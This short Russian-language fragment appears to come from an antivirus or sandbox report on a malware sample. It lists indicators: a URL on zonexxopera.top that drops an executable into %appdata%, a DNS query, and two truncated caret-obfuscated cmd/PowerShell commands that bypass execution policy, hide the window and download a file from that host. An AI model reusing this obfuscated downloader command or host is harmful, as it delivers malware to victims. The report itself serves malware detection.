Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^WEr^S^HELl^.^E^X^E ^-^EX^eCUtIoNP^oLicy^ bY^PaSS^ -^n^OPR^OfilE ^-^WINd^owStYL^e Hi^DdEN (ne^w^-^O^BjeCt S^Yst^Em.n^et^.^W^eB^cliENT^)^.dO^wN^LOAdfi^L^e('http://zonexxoper...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /c "PO^WEr^S^HELl^.^E^X^E ^-^EX^eCUtIoNP^oLicy^ bY^PaSS^ -^n^OPR^OfilE ^-^WINd^owStYL^e Hi^DdEN (ne^w^-^O^BjeCt S^Yst^Em.n^et^.^W^eB^cliENT^)^.dO^wN^LOAdfi^L^e('http://zonexxoper...' (со скрытым окном)